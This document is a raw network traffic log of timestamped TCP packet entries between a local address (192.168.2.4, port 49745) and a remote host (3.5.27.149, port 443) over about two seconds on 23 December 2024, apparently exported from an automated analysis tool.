Dec 23, 2024 17:30:28.437285900 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.437314034 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.437331915 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.463395119 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.463435888 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.463445902 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.463474989 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.463490963 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.463506937 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.463567019 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.463567019 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.485660076 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.485678911 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.485699892 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.485737085 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.485759020 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.485857964 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.485867023 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.485940933 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.507915974 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.507956028 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.508094072 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.508094072 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.508114100 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.528847933 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.528878927 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.528978109 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.528997898 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.529022932 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.554167986 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.554239035 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.554270029 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.554292917 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.554320097 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.603298903 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.608628988 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.621751070 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.621767998 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.621787071 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.621794939 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.621905088 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.621922016 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.622029066 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.637157917 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.637175083 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.637222052 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.637257099 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.637289047 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.637303114 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.637336016 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.653400898 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.653419971 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.653470039 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.653506041 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.653513908 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.653547049 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.653547049 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.653570890 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.653588057 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.653688908 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.666687965 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.666714907 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.666770935 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.666891098 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.666892052 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.666892052 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.666914940 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.675565004 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.675595045 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.675683022 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.675683022 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.675700903 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.683506012 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.683582067 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.683609009 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.683624983 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.683665037 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.692504883 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.692550898 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.692574024 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.692590952 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.692629099 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.692650080 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.705549002 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.804440975 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.804476023 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.804513931 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.804714918 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.804714918 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.804744005 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.811835051 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.811866999 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.811975002 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.812000990 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.812056065 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.818541050 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.818593979 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.819334984 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.819710016 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.819730997 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.819904089 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.825144053 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.825174093 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.825257063 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.825272083 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.825489044 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.825979948 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.832076073 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.832102060 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.832243919 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.832262039 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.838754892 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.838804007 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.838892937 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.838892937 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.838912010 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.845319033 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.845383883 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.845462084 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.845462084 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.845479965 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.900425911 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.900443077 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.949740887 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.992846012 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.992861032 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.992903948 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.992921114 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.992948055 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.993005037 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.993027925 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.993057013 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.998722076 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.998754978 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.998764038 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.998778105 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:28.998846054 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.998846054 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:28.998857021 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.006119967 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.006153107 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.006162882 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.006217003 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.006232023 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.006283998 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.012736082 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.012772083 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.012804031 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.012831926 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.012844086 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.012900114 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.012917995 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.019239902 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.019258976 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.019320011 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.019330978 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.019417048 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.019423962 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.025557995 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.025580883 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.025664091 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.025664091 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.025671959 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.032835960 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.032890081 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.032897949 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.032918930 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.032963991 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.032963991 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.039438963 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.039455891 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.039505005 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.039515018 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.039562941 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.039875031 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.087696075 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.187709093 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.187740088 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.187787056 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.187861919 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.187887907 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.187896967 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.194272041 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.194297075 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.194345951 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.194353104 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.194369078 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.201143026 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.201193094 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.201234102 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.201246023 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.201246023 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.201255083 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.201293945 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.207710028 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.207729101 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.207808018 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.207808018 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.207815886 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.207869053 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.208290100 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.215723991 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.215739965 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.215775013 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.215790987 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.215828896 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.220976114 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.220997095 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.221045017 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.221064091 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.221153021 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.227655888 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.227688074 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.227760077 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.227760077 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.227767944 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.275135040 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.275146961 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.322019100 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.376637936 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.376651049 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.376669884 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.376677036 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.376775980 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.376775980 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.376787901 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.376832008 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.376890898 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.382637024 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.382654905 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.382683039 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.382715940 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.382723093 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.382761002 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.389236927 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.389266968 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.389308929 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.389323950 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.389333963 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.396619081 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.396646023 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.396703959 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.396703959 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.396716118 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.396810055 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.403224945 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.403242111 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.403305054 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.403320074 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.403384924 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.403392076 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.409406900 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.409426928 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.409502029 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.409502029 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.409508944 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.415960073 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.415988922 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.416066885 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.416074038 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.416163921 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.416836023 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.416841030 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.416881084 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.423372984 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.423391104 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.423412085 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.423455954 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.423463106 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:29.423472881 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:29.426919937 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.078389883 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.078401089 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.078435898 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.078538895 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.078561068 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.078577042 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.078618050 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.079046965 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.079072952 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.079116106 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.079125881 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.079143047 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.080226898 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.080281973 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.080319881 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.080333948 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.080410957 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.080410957 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.081132889 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.081159115 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.081197023 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.081203938 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.081214905 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.081247091 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.081247091 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.082019091 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.082037926 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.082071066 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.082107067 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.082115889 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.082140923 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.082211018 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.082964897 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.082982063 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.083014965 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.083048105 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.083060026 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.083081961 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.083206892 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.083228111 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.083256960 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.083266020 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.083328962 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.084249973 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.084266901 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.084322929 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.084340096 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.084353924 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.085208893 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.085231066 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.085287094 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.085295916 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.085309029 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.086469889 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.086492062 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.086652040 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.086652040 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.086668968 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.087261915 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.087292910 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.087336063 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.087347031 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.087357998 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.088268995 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.088330030 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.088392973 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.088398933 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.088398933 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.088417053 CET	443	49745	3.5.27.149	192.168.2.4
